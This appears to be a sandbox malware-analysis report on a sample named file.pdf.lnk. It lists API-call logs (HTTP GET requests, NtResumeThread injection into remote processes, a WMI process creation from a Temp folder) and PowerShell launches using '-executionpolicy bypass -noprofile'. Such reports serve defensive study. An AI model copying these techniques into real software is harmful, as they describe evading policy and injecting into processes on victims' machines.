HttpOpenRequestW Aug. 21, 2024, 2:24 p.m.	connect_handle: 0x00cc0008 http_version: flags: 12582928 http_method: GET referer: path: /TEST22-PC	1	13369356
HttpOpenRequestW Aug. 21, 2024, 2:24 p.m.	connect_handle: 0x00cc0008 http_version: flags: 12582928 http_method: GET referer: path: /TEST22-PC	1	13369356
HttpOpenRequestW Aug. 21, 2024, 2:24 p.m.	connect_handle: 0x00cc0008 http_version: flags: 12582928 http_method: GET referer: path: /TEST22-PC	1	13369356
HttpOpenRequestW Aug. 21, 2024, 2:24 p.m.	connect_handle: 0x00cc0008 http_version: flags: 12582928 http_method: GET referer: path: /TEST22-PC	1	13369356
HttpOpenRequestW Aug. 21, 2024, 2:24 p.m.	connect_handle: 0x00cc0008 http_version: flags: 12582928 http_method: GET referer: path: /TEST22-PC	1	13369356
HttpOpenRequestW Aug. 21, 2024, 2:24 p.m.	connect_handle: 0x00cc0008 http_version: flags: 12582928 http_method: GET referer: path: /TEST22-PC	1	13369356
HttpOpenRequestW Aug. 21, 2024, 2:24 p.m.	connect_handle: 0x00cc0008 http_version: flags: 12582928 http_method: GET referer: path: /TEST22-PC	1	13369356

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3016 resumed a thread in remote process 1784
Process injection	Process 1784 resumed a thread in remote process 2320
NtResumeThread Aug. 21, 2024, 2:24 p.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 1784	1	0	0
NtResumeThread Aug. 21, 2024, 2:24 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2320	1	0	0

Creates a suspicious Powershell process (26 events)

option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile

Uses WMI to create a new process (1 event)

Time & API	Arguments	Status	Return	Repeated
IWbemServices_ExecMethod Aug. 21, 2024, 2:24 p.m.	inargs.CurrentDirectory: None inargs.CommandLine: C:\Users\test22\AppData\Local\Temp\ie4uinit.exe -BaseSettings inargs.ProcessStartupInformation: None outargs.ProcessId: 2524 outargs.ReturnValue: 0 flags: 0 method: Create class: Win32_Process	1	0	0

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (22 events)

file	C:\Windows\SysWOW64\wscript.exe
file	C:\Windows\System32\cmd.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

file.pdf.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All